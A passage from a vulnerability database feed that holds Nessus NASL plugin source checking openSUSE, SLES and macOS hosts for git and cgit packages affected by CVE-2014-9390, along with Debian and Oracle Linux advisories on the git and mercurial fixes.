(os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-core-1.8.5.6-5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-core-debuginfo-1.8.5.6-5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-debugsource-1.8.5.6-5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-05T11:12:26", "description": "The git web frontend cgit was updated to 0.11.2 to fix security issues\nand bugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2014-9390: arbitrary command execution vulnerability\n on case-insensitive file systems in git. Malicious\n commits could affect client users on all platforms using\n case-insensitive file systems when using vulnerable git\n versions.\n\nIn addition cgit was updated to 0.11.2 with minor improvements and bug\nfixes.\n\nThe embedded git version was updated to 2.4.3.", "edition": 12, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-06-23T00:00:00", "title": "openSUSE Security Update : cgit (openSUSE-2015-436)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2015-06-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:cgit-debugsource", "p-cpe:/a:novell:opensuse:cgit-debuginfo", "p-cpe:/a:novell:opensuse:cgit", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2015-436.NASL", "href": "https://www.tenable.com/plugins/nessus/84335", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-436.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84335);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2014-9390\");\n\n script_name(english:\"openSUSE Security Update : cgit (openSUSE-2015-436)\");\n script_summary(english:\"Check for the openSUSE-2015-436 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The git web frontend cgit was updated to 0.11.2 to fix security issues\nand bugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2014-9390: arbitrary command execution vulnerability\n on case-insensitive file systems in git. Malicious\n commits could affect client users on all platforms using\n case-insensitive file systems when using vulnerable git\n versions.\n\nIn addition cgit was updated to 0.11.2 with minor improvements and bug\nfixes.\n\nThe embedded git version was updated to 2.4.3.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=910756\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cgit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cgit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cgit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cgit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1|SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1 / 13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cgit-0.11.2-11.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cgit-debuginfo-0.11.2-11.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cgit-debugsource-0.11.2-11.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cgit-0.11.2-13.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cgit-debuginfo-0.11.2-13.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"cgit-debugsource-0.11.2-13.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cgit / cgit-debuginfo / cgit-debugsource\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:30:06", "description": "The remote Mac OS X host has a version of GitHub prior to 194\ninstalled. It is, therefore, affected by a remote command execution\nvulnerability when processing git trees in a case-insensitive or\ncase-normalizing file system. A remote attacker, using a specially\ncrafted git tree, can overwrite a user's '.git/config' file when the\nuser clones or checks out a repository, allowing arbitrary command\nexecution.", "edition": 15, "published": "2014-12-23T00:00:00", "title": "GitHub < 1.9.4 .git/config Command Execution (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:github:github", "cpe:/a:git:git"], "id": "MACOSX_GITHUB_194.NASL", "href": "https://www.tenable.com/plugins/nessus/80220", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80220);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_bugtraq_id(71732);\n\n script_name(english:\"GitHub < 1.9.4 .git/config Command Execution (Mac OS X)\");\n script_summary(english:\"Checks the version of GitHub.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an application installed that is affected by a\nremote command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X host has a version of GitHub prior to 194\ninstalled. It is, therefore, affected by a remote command execution\nvulnerability when processing git trees in a case-insensitive or\ncase-normalizing file system. A remote attacker, using a specially\ncrafted git tree, can overwrite a user's '.git/config' file when the\nuser clones or checks out a repository, allowing arbitrary command\nexecution.\");\n # https://github.com/blog/1938-vulnerability-announced-update-your-git-clients\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ad68bb83\");\n script_set_attribute(attribute:\"see_also\", value:\"http://article.gmane.org/gmane.linux.kernel/1853266\");\n # http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?afc47628\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.9.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:github:github\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:git:git\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_github_installed.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/GitHub\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nappname = \"GitHub\";\n\ninstall = get_single_install(app_name:appname, exit_if_unknown_ver:TRUE);\npath = install[\"path\"];\nver = install[\"version\"];\n\nfix = '194';\n\n# Versions are sequential. ver_compare() may be a little\n# silly for a single node, but it works.\nif (ver_compare(ver:ver, fix:fix, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(port:0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, ver, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:15:57", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9462", "CVE-2014-9390"], "description": "Package : mercurial\nVersion : 1.6.4-1+deb6u1\nCVE ID : CVE-2014-9390 CVE-2014-9462\n\nCVE-2014-9462\n\n Jesse Hertz of Matasano Security discovered that Mercurial, a\n distributed version control system, is prone to a command injection\n vulnerability via a crafted repository name in a clone command.\n\nCVE-2014-9390\n\n is a security vulnerability that affects mercurial repositories in a\n case-insensitive filesystem (eg. VFAT or HFS+). It allows for remote\n code execution of a specially crafted repository. This is less\n severe for the average Debian installation as they are usually set\n up with case-sensitive filesystems.\n\n\n", "edition": 7, "modified": "2015-06-04T07:25:25", "published": "2015-06-04T07:25:25", "id": "DEBIAN:DLA-237-1:BBA66", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201506/msg00001.html", "title": "[SECURITY] [DLA 237-1] mercurial security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-12T00:51:25", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9462", "CVE-2014-9390"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3257-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nMay 11, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mercurial\nCVE ID : CVE-2014-9462\nDebian Bug : 783237\n\nJesse Hertz of Matasano Security discovered that Mercurial, a\ndistributed version control system, is prone to a command injection\nvulnerability via a crafted repository name in a clone command.\n\nFor the oldstable distribution (wheezy), this problem has been fixed in\nversion 2.2.2-4+deb7u1. This update also includes a fix for\nCVE-2014-9390 previously scheduled for the next wheezy point release.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 3.1.2-2+deb8u1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 3.4-1.\n\nWe recommend that you upgrade your mercurial packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2015-05-11T20:05:43", "published": "2015-05-11T20:05:43", "id": "DEBIAN:DSA-3257-1:168E5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00146.html", "title": "[SECURITY] [DSA 3257-1] mercurial security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:21", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9390", "CVE-2015-7545"], "description": "[1.9.4-3.1]\n- fix arbitrary code execution via crafted URLs\n Resolves: #1273889\n[1.9.4-3]\n- fix CVE-2014-9390\n Resolves: rhbz#1220552", "edition": 4, "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2015-2515", "href": "http://linux.oracle.com/errata/ELSA-2015-2515.html", "title": "git19-git security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}